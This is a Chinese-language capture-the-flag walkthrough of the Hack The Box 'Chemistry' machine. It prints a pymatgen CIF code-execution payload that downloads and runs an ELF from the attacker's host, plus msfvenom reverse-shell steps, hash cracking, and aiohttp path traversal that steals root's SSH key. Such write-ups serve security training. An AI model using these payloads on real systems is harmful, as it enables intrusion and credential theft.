HTB靶场 Chemistry (Linux)[Easy]

admin 2024年10月26日21:13:48评论200 views字数 1971阅读6分34秒阅读模式
本文章仅用于网络安全研究学习,请勿使用相关技术进行违法犯罪活动。
Hack The Box是一个国外的靶机在线平台,实验环境将实时更新,允许您测试您的渗透测试技能。

知识点:命令执行漏洞、本地文件包含 

kali:10.10.16.9
Tricker:10.10.11.38
0001.获取app用户权限
使用nmap进行扫描,开放端口有225000
nmap -sC -sV -O -oN nmap.txt 10.10.11.38
HTB靶场 Chemistry (Linux)[Easy]
访问5000端口,登录后主页如下:    
网站功能包含注册登录上传CIF文件分析CIF文件
CIF文件全称为晶体学信息文件(Crystallographic Information File),是材料学使用的文件格式。
HTB靶场 Chemistry (Linux)[Easy]
网上搜索CIF相关信息,找到任意代码执行漏洞,POC如下:

CIF文件导致命令执行

https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
data_5yOhtAoR_audit_creation_date            2018-06-08_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"loop__parent_propagation_vector.id_parent_propagation_vector.kxkykzk1 [0 0 0]_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("wget 10.10.16.9/sss.elf && chmod +x sss.elf && ./sss.elf");0,0,0'    _space_group_magn.number_BNS  62.448_space_group_magn.name_BNS  "P  n'  m  a'  "
使用bash反弹shell失败,尝试msf,步骤如下:
终端1
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.10.16.9 lport=4446 -f elf>sss.elfpython -m http.server 80
终端2
msfconsoleuse exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 10.10.16.9set lport 4446run
上述POC代码保存为vuln.cif文件,上传后访问,获取app用户权限
HTB靶场 Chemistry (Linux)[Easy]    
0002.获取rosa用户权限
当前目录没有user.txt,查看/home目录下有app用户和rosa用户。
HTB靶场 Chemistry (Linux)[Easy]
/home/app/instance/目录下发现数据库文件database.db,在靶机上直接运行如下命令,获取rosa用户的hash值。
sqlite3 /home/app/instance/database.db.tableselect * from user;
HTB靶场 Chemistry (Linux)[Easy]
保存到本地rosa.hash,使用hashcat破解,获取rosa密码:
hashcat -m 0 rosa.hash rockyoushow
HTB靶场 Chemistry (Linux)[Easy]
使用ssh登录rosa用户:
ssh rosa@10.10.11.38
HTB靶场 Chemistry (Linux)[Easy]
0003.获取root用户权限
经过信息收集,发现开放了8080端口
netstat -tuln
HTB靶场 Chemistry (Linux)[Easy]
8080端口映射到本地,访问主页如下:
是个管理服务的网站,只有一个功能就是查看当前服务状态,其它功能都没做。
ssh rosa@10.10.11.38 -L 8080:localhost:8080
HTB靶场 Chemistry (Linux)[Easy]
网站太简单一度以为不是突破口,测试了很多点,再绕回来才找到漏洞。
请求包返回服务里面有Python/3.9 aiohttp/3.9.1    
HTB靶场 Chemistry (Linux)[Easy]
搜索aiohttp/3.9.1漏洞,发现有文件包含漏洞,成功访问/assets/../../../../../root/root.txt成功
HTB靶场 Chemistry (Linux)[Easy]
读取/assets/../../../../../root/.ssh/id_rsa文件复制到本地root_id_rsa,使用凭证访问获取root用户权限。
chmod root_id_rsassh -I root_id_rsa root@10.10.11.38
HTB靶场 Chemistry (Linux)[Easy]
感谢观看

原文始发于微信公众号(Rsec):HTB靶场 Chemistry (Linux)[Easy]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月26日21:13:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB靶场 Chemistry (Linux)[Easy]https://cn-sec.com/archives/3318806.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息